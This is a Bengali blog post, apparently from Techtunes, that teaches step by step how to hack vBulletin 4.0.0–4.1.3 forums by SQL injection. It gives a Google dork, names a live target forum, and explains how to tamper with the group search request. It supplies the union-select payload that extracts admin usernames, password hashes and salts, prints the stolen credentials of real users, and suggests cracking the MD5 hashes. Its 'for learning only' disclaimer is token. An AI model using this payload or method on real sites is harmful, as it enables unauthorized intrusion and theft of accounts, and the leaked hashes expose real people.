সালাম জানিয়র শুরু করছি আজকের টুট...
আসলে আমি কোন প্রফেসোনাল ব্লগার না। সেজন্যে আমার লেখায় তেমন রস টস নাই... 😀
সুতারাং অনেকের ই ভালো লাগার কথা নয়। সুতারাং যাদের কাছে ভালো লাগবেনা দয়া করে তারা কমেন্ট
দিবেন না। কারন এর চেয়ে ভালো আমার দারা সম্ভব না। 😀
আজকে আমি লিখবো কি করে ভি বুলেটিন দিয়ে বানানো ফোরাম হ্যাক করা যায়। আর হ্যা, এই লেখা শুধুমাত্র
শেখার জন্যে। অন্য কোন উদ্যেশ্যে ব্যাবহার করলে নিজের দায়িত্তে করবেন।
আসুন তাহোলে শুরু করা যাকঃ
আমার দেয়া হ্যাকিং পন্থা টা কাজ করবেঃ Vbulletin 4.0.0 =>> 4.1.3 (4.1.4 বা তার
উপরের ভার্সনে কাজ করবে না।
গুগল ডর্কঃ Powered By Vbulletin 4.1.0 (আথবা অন্য ভার্সন)
যা যা লাগবেঃ
১। মজিলা ফায়ারফক্স
২। মজিলা addon Http Header (ডাউনলোড করুন এখান থেকে, https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
৩। আল্লাহ প্রদত্ত সবচেয়ে বড় টুলস "ব্রেইন"। 😛
গুগল এর সাহাজ্যে Vuln. সাইট খুজে বের করুন।
আমি করেছি, http://www.carrito.net/board
টার্গেট সাইট...
এবার আপনার টার্গেট সাইটে একটা একাউন্ট খুলে ফেলুন।
মেনু থেকে গ্রুপ এ ক্লিক করুন। নিচের ছবির মত।
গ্রুপ মেনু থেকে যে কোন একটি গ্রুপের নাম কপি করুন। যদি কোন গ্রুপ না থাকে তাহলে একটি গ্রুপ Create
করুন "Create Group" এ ক্লিক করে। নিচের ছবির মত। আমার ভাগ্য ভালো যে আমার টার্গেট
সাইটে কিছু গ্রুপ আগে থেকেই তৈরি করা ছিলো। তাই আমি "romba" নামক গ্রুপটির নাম কপি করেছি।
এবার Advanced Search এ যান। নিচের ছবিতে নির্দেসিত।
Search Types: এ Groups এ টিক চিনহ দিন।
Keyword(s): এ আপনার গ্রুপ এর নাম দিন। (আমি দিয়েছি romba)
Exact name এ টিক দিন।
না বুঝতে পারলে নিচের ছবিটি দেখুন।
এবার ফায়ারফক্স এর মেনু থেকে Tools>>Live Http Headers এ ক্লিক করুন।
টার্গেট সাইটের Search Now বাটনে ক্লিক করুন।
টাস্কবার থেকে Live HTTP Headers অপেন করুন।
HTTP Headers এর মধ্যে থেকে type%5B5D=.............. খুজে বের করুন। না বুঝলে নিচের
ছবিটি দেখুন।
খুজে পেলে ওইটুকু সিলেক্ট করে ReplY তে ক্লিক করুন। নিচের ছবির মত উইন্ডো ওপেন হবে।
"=" এর পরে যেখানে শেষ হয়েছে সেখানে নিচের কোডটি কপি করে পেস্ট করুন। এবং Reply এ ক্লিক করুন।
&cat[0]=1) union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,salt,usergroupid) from user where usergroupid=6#
ছবিটা দেখে নিন। সহজেই বুঝবেন।
হ্যা আমরা প্রায় শেষ প্রান্তে এসে গেছি।
নিচের ছবিতি দেখে নিন আগে। আমরা Admin id and Pass পেয়ে গেছি।
আমার টার্গেট সাইট এ যেটা পেলাম...
Search:Type: Groups; Keyword(s): romba; : Uncategorized, 11403:PacoPH:e3f3de08ff50de3f77eb4fbb7c0ae9e1:!YS6,24169:3Fl24ilV:0c1bcad862e034842962380e9cdd520c:,Y~6,26060:CIVIC turbo WEST:5226f7c8e1815cae6632d04477b5e1c2:GT~6,42738:osva:a50660376692f9b614b9df5a71c59ecf:)+N6
USer name:PacoPH Hash: e3f3de08ff50de3f77eb4fbb7c0ae9e1 SaLt: !YS6,24169:3Fl24ilV Admin Id: PacoPH Password: e3f3de08ff50de3f77eb4fbb7c0ae9e1 বি.দ্র. এখানে পাসোয়ারড টি MD5 encoded অবস্থায় আছে এটাকে ডিকোড করতে পারেন বিভিন্ন সফটওয়্যার দিয়ে অথবা অনেক ওয়েবসাইট আছে যারা ফ্রি তে ডিকোড করার সেবা দিয়ে থাকে। সবশেষে সবাইকে আমাদের ফোরাম WWW.BDHACKERZ.COM.NU থ্রক্র ঘুরে আসার জন্যে অনুরধ রইলো
আমি Snip3r। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 3 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 9 টি টিউন ও 59 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
I am nobody... so, nothing to say... :D
😀